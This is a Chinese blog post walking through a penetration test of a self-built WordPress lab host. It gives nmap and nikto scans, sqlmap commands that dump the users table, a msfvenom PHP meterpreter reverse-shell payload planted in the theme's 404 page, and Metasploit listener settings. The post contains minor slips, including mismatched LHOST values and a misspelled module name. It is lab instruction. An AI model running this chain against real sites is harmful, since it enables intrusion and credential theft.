WordPress网站渗透测试(进阶详细思路)

  • Post author:
  • Post category:其他




wordpress网站渗透测试

WordPress是一款免费开源的内容管理系统(CMS)

WordPress官方站点

英文站点:https://wordpress.org

中文站点:https://cn.wordpress.org/

WordPress主要用于搭建网站,包括博客和其它各种类型的网站。它有非常多不同风格的主题来呈现不同的外观,通过使用不同的插件实现千变万化的功能,可以使用WordPress来创建不同类型的网站。

WordPress缺点

1、插件虽多,但是不能安装太多插件,否则会拖累网站速度和降低用户体验;

2、服务器空间选择自由较小;

3、静态化较差,最多只能生成首页和文章页静态页面,所以只能对整站实现伪静态化;

4、wordpress适合中小型的站点,轻量级的架构决定它不适合做大型站点;



wordpress渗透过程

注意:环境本人自己搭建

1.信息收集

2.网站爆破

3.上传木马

4.设置监听

网站ip:172.16.1.107



信息收集

nmap -sV -p- 172.16.1.107 探测目标靶机的服务版本信息

在这里插入图片描述

发现靶机开启22,80,443,8080端口

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

对80端口进行深入挖掘

nikto -host http://172.16.1.107对服务器80端口进行扫描

发现logig.php登录页面

在这里插入图片描述

在这里插入图片描述



网站爆破

使用sqlmap对网站进行暴力破解

sqlmap -u “http://172.16.1.107/login.php” –forms –level 3

在这里插入图片描述

sqlmap -u “http://172.16.1.107/login.php” –forms –level 3 –dbs 查看数据库

在这里插入图片描述

sqlmap -u “http://172.16.1.107/login.php” –forms –level 3 -D wordpress8080 -T users -tables

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

sqlmap -u “http://172.16.1.107/login.php” –forms –level 3 -D wordpress8080 -T users –dump

在这里插入图片描述

在这里插入图片描述

登录http://172.16.1.107:8080/wordpress/wp-login.php

在这里插入图片描述



上传木马

登录网页后找到插件,404页面

在这里插入图片描述

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.107 LPORT=4448 -f raw > likes.php 生成木马

在这里插入图片描述

将木马上传到404页面中,刷新页面

在这里插入图片描述

在这里插入图片描述



设置监听

use exploit/multi/hander 使用监听模块

set payload php/meterpreter/reverse_tcp 设置payload

show options

set LHOST 172.16.1.134

set LPORT 4448

在这里插入图片描述

访问http://172.16.1.107/wordpress/404.php建立会连

在这里插入图片描述

成功入侵靶机



版权声明:本文为weixin_51957047原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。